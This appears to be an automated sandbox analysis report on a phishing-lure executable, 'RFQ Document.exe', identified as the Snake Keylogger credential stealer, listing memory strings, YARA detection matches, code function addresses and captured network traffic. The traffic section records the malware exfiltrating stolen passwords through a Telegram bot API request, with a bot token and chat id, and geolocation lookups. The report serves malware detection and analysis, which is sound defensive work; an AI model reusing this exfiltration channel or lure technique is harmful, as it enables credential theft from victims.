Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgD81lT
Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgD81lT8
Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgD81lT~
Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgD81lda0
Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgD81ldb
Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgD81ll
Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgD81lt
Source: RFQ Document.exe, RFQ Document.exe, 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp	String found in binary or memory: https://freegeoip.app/xml/
Source: RFQ Document.exe, 00000002.00000002.926634482.00000000024A7000.00000004.00000001.sdmp	String found in binary or memory: https://freegeoip.app/xml/84.17.52.39
Source: RFQ Document.exe, 00000002.00000002.926634482.00000000024A7000.00000004.00000001.sdmp	String found in binary or memory: https://freegeoip.app41l

Source: unknown

HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255b68d7103Host: api.telegram.orgContent-Length: 407Connection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: clientconfig.passport.net

Source: global traffic	HTTP traffic detected: GET /xml/84.17.52.39 HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49775 version: TLS 1.2

Source: C:\Users\user\Desktop\RFQ Document.exe

Code function: 1_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_00404FF1

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 2.2.RFQ Document.exe.7b49c8.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RFQ Document.exe.22f0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RFQ Document.exe.3465530.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RFQ Document.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RFQ Document.exe.7b49c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RFQ Document.exe.4940000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.RFQ Document.exe.e7e1458.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.1.RFQ Document.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RFQ Document.exe.3465530.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RFQ Document.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.RFQ Document.exe.e7e1458.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RFQ Document.exe.22f0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.RFQ Document.exe.e7d0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.RFQ Document.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RFQ Document.exe.415058.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.1.RFQ Document.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RFQ Document.exe.415058.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.1.RFQ Document.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: RFQ Document.exe

Executable has a suspicious name (potential lure to open the executable)

Show sources

Source: RFQ Document.exe

Static file information: Suspicious name

Source: RFQ Document.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 2.2.RFQ Document.exe.7b49c8.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.RFQ Document.exe.22f0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.RFQ Document.exe.3465530.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.RFQ Document.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.RFQ Document.exe.7b49c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.RFQ Document.exe.4940000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.RFQ Document.exe.e7e1458.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.1.RFQ Document.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.RFQ Document.exe.3465530.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.RFQ Document.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.RFQ Document.exe.e7e1458.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.RFQ Document.exe.22f0000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.RFQ Document.exe.e7d0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.RFQ Document.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.RFQ Document.exe.415058.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.1.RFQ Document.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.RFQ Document.exe.415058.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.1.RFQ Document.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE

Source: C:\Users\user\Desktop\RFQ Document.exe

Code function: 1_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

1_2_0040312A

Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 1_2_00406354	1_2_00406354
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 1_2_00404802	1_2_00404802
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 1_2_00406B2B	1_2_00406B2B
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 1_2_6FD87500	1_2_6FD87500
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 1_2_6FD8BA79	1_2_6FD8BA79
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 1_2_6FD8BA6A	1_2_6FD8BA6A
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 1_2_6FD8754F	1_2_6FD8754F
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0040A2A5	2_2_0040A2A5
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_023451B0	2_2_023451B0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0234E182	2_2_0234E182
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0234C1D7	2_2_0234C1D7
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0234D660	2_2_0234D660
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_023486B0	2_2_023486B0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_02342772	2_2_02342772
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_02343578	2_2_02343578
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0234E5E2	2_2_0234E5E2
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0234EA40	2_2_0234EA40
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_02344B88	2_2_02344B88
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0234EEA1	2_2_0234EEA1
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0234DD06	2_2_0234DD06
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0234CD60	2_2_0234CD60
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0234D650	2_2_0234D650
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0234B6F8	2_2_0234B6F8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0234B6E8	2_2_0234B6E8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_023426CE	2_2_023426CE
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0234DCB0	2_2_0234DCB0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594A998	2_2_0594A998
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594DDB8	2_2_0594DDB8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594ADF0	2_2_0594ADF0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594D508	2_2_0594D508
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05941130	2_2_05941130
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594A540	2_2_0594A540
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594D960	2_2_0594D960
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05949C90	2_2_05949C90
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594D0B0	2_2_0594D0B0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594A0E8	2_2_0594A0E8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594C800	2_2_0594C800
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05949838	2_2_05949838
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594CC58	2_2_0594CC58
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05948F88	2_2_05948F88
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594C3A8	2_2_0594C3A8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059493E0	2_2_059493E0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05948B30	2_2_05948B30
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594BF50	2_2_0594BF50
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594B6A0	2_2_0594B6A0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059486D8	2_2_059486D8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594BAF8	2_2_0594BAF8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594E210	2_2_0594E210
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05945650	2_2_05945650
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594B248	2_2_0594B248
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594A98A	2_2_0594A98A
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594DDA9	2_2_0594DDA9
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594ADE0	2_2_0594ADE0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594A530	2_2_0594A530
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05941124	2_2_05941124
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594D951	2_2_0594D951
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05944C9A	2_2_05944C9A
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05949C80	2_2_05949C80
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594D0A0	2_2_0594D0A0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05944CA8	2_2_05944CA8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594A0D8	2_2_0594A0D8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594D4FA	2_2_0594D4FA
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05949828	2_2_05949828
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594CC48	2_2_0594CC48
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594C398	2_2_0594C398
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059493D2	2_2_059493D2
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594C7F0	2_2_0594C7F0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05948B21	2_2_05948B21
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594BF42	2_2_0594BF42
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05948F78	2_2_05948F78
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594B691	2_2_0594B691
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059486C7	2_2_059486C7
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594BAE8	2_2_0594BAE8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594B238	2_2_0594B238
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05974588	2_2_05974588
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0597C529	2_2_0597C529
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05973CB0	2_2_05973CB0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059784E0	2_2_059784E0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05973400	2_2_05973400
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0597A468	2_2_0597A468
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05970C68	2_2_05970C68
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05975F98	2_2_05975F98
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05972FA8	2_2_05972FA8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059797C8	2_2_059797C8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05977E98	2_2_05977E98
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059726D0	2_2_059726D0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059756E8	2_2_059756E8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05979E18	2_2_05979E18
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05974E38	2_2_05974E38
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059771F8	2_2_059771F8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059749E0	2_2_059749E0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05974108	2_2_05974108
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05979178	2_2_05979178
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05971968	2_2_05971968
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05973858	2_2_05973858
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05970040	2_2_05970040
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05977848	2_2_05977848
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059763F0	2_2_059763F0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05978B28	2_2_05978B28
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05972B50	2_2_05972B50
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05975B40	2_2_05975B40
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05975290	2_2_05975290
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0597AAB0	2_2_0597AAB0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0597457A	2_2_0597457A
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05973CA0	2_2_05973CA0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059784D0	2_2_059784D0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0597A45A	2_2_0597A45A
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05972F9A	2_2_05972F9A
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05975F88	2_2_05975F88
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059797B8	2_2_059797B8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05977E88	2_2_05977E88
